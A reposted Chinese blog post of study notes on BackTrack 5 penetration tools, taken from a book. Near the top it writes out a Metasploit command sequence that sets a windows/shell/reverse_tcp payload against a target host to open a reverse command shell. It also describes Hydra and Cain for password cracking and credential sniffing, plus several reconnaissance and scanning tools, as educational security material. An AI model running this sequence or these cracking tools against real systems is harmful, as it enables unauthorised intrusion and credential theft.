Back Track 5 之 漏洞攻击 && 密码攻击 && Windows下渗透工具
来源:互联网 发布:网络诈骗50万100万 编辑:程序博客网 时间:2024/05/16 05:18
网络漏洞攻击工具
Metasploit
先msfupdate升级:
然后选择msfconsole:
接下来:
set LHOST 本机IP地址setLPORT 4445setg PAYLOAD windows/shell/reverse_tcpsetg RHOST 目标IP地址setg port 21set target 随意数字exploit
这样就可以反弹一个cmd shell了。
密码破解
Hydra
多samba,smb,ssh,smtp,telnet,mysql,ftp,vnc,icq,socks5,pcnfs,cisco等各类主流服务进行在线密码破解攻击尝试攻击。
字典破解,Protocol中有很多,主要是之前扫描出来的端口开放情况来进行的。
Windows下渗透工具介绍
maltegoCE
DNS收集。
IBM Rational AppScan
自动化web应用的安全漏洞评估工作,能扫描和检测所以常见的web应用安全漏洞,例如SQL注入、跨站点脚本攻击、缓冲区溢出以及最新的FLASH/FLEX应用和Web2.0应用暴露等方面安全漏洞扫描。
SmartWhois
查找所以关于IP地址、主机名或者域名的可用信息,包括国家、州或省、沉城市、网络供应方、网络管理员和技术支持信息。
Sam Spade
如果一个黑客想查询一个有域名的公司的某些信息,通常可以对该域名执行whois命令来找到附加信息。UNIX的大多数版本都装有whois,所以黑客只需要在终端窗口或者命令提示前输入“whois 要攻击的域名”就可以了。而对于windows的操作系统,要执行whois命令就需要一个第三方的工具:sam spade。
Cain
可以破解屏保、PWL密码、共享密码、缓存口令、远程共享口令、SMB口令、支持VNC口令解码、Cisco Type-7口令解码、Base64口令解码、SQL Server 7.0/2000口令解码、Remote Desktop口令解码、Access Database口令解码、Cisco PIX Firewall口令解码、Cisco MD5解码、NTLM Session Security口令解码、IKE Aggressive Mode Pre-Shared Keys口令解码等综合工具,还可以远程破解,可以挂字典以及暴力破解,其sniffer功能极其强大,几乎可以明文捕获一切帐号口令,包括FTP、HTTP、IMAP、POP3、SMB、TELNET、VNC、TDS、SMTP、MSKERB5-PREAUTH、MSN、RADIUS-KEYS、RADIUS-USERS、ICQ、IKE Aggressive Mode Pre-Shared Keys authentications等
FOCA Free
可以找出更多有关分析网站提供的任何文件的元数据。
Nessus
前面讲到过。= =
Nmap – Zenmap GUI
一个网络扫描程序,你还可以用它来看别人电脑在下载什么。
Metasploit
Metasploit是一款开源的安全漏洞检测工具,可以帮助安全和IT专业人士识别安全性问题,验证漏洞的缓解措施,并管理专家驱动的安全性进行评估,提供真正的安全风险情报。这些功能包括智能开发,密码审计,Web应用程序扫描,社会工程。团队合作,在Metasploit和综合报告提出了他们的发现。
Firefox Portable
火狐的插件。
获取的知识
再次感谢《back track 5 从入门到精通 ——渗透之道》这本书。
这本书算是边学习边操作边记录边分享的完成了,但是BT5里面还有很多工具,以后我会主要分享里面很实用很实用的工具。
希望学习完这本书能够BT5基本入个门,在打开每个工具的时候,都会有帮助,太棒了~~~其实可以直接看帮助的,但是全是英文,虽然我个人觉得我的英文还不错。
转载请注明出处:http://www.cnblogs.com/yydcdut/p/3491302.html
- Back Track 5 之 漏洞攻击 && 密码攻击 && Windows下渗透工具
- 渗透测试漏洞利用之漏洞攻击
- Kali密码攻击之在线攻击工具
- 5-渗透攻击之旅
- Back Track 5 之 Web踩点 && 网络漏洞
- Kali密码攻击之离线攻击工具(一)
- Kali密码攻击之离线攻击工具(二)
- kali密码攻击之——在线攻击工具
- Kali密码攻击之——离线攻击工具
- metasploit文件格式漏洞渗透攻击(失败)
- Kali密码攻击工具
- windows缓冲区溢出漏洞攻击
- 利用数据库漏洞扫描评估数据库安全性 6 渗透攻击
- metasploit文件格式漏洞渗透攻击(成功生成doc)
- metasploit文件格式漏洞渗透攻击(成功获得shell)
- web渗透——SQL注入漏洞攻击步骤
- SQL注入攻击之SQLMap渗透测试
- SQLMAP渗透笔记之Mysql Dos攻击
- Back Track 5 之 Web踩点 && 网络漏洞
- 史上最全AndroidStudio快捷键中文版
- makefile中的CFLAGS与LDFLAGS
- 2015CSDN下载热门书籍
- JS原型链 new 与 Object.Create()区别 代码及继承的方法
- Back Track 5 之 漏洞攻击 && 密码攻击 && Windows下渗透工具
- LibGDX教程——重建Flappy Bird——(5) 添加Box2D物理仿真和游戏逻辑
- Java学习第8天(4):面向对象-继承-abstract
- 竟然有92%的年轻创业者认为事业比家庭重要,三分之一的人创业成功后想移民!
- ViewPager 的使用
- AJAX学习笔记(五)——JSON格式
- Spring Integration实例代码分析之basic--http
- mongodb
- SQL Server中的事务与锁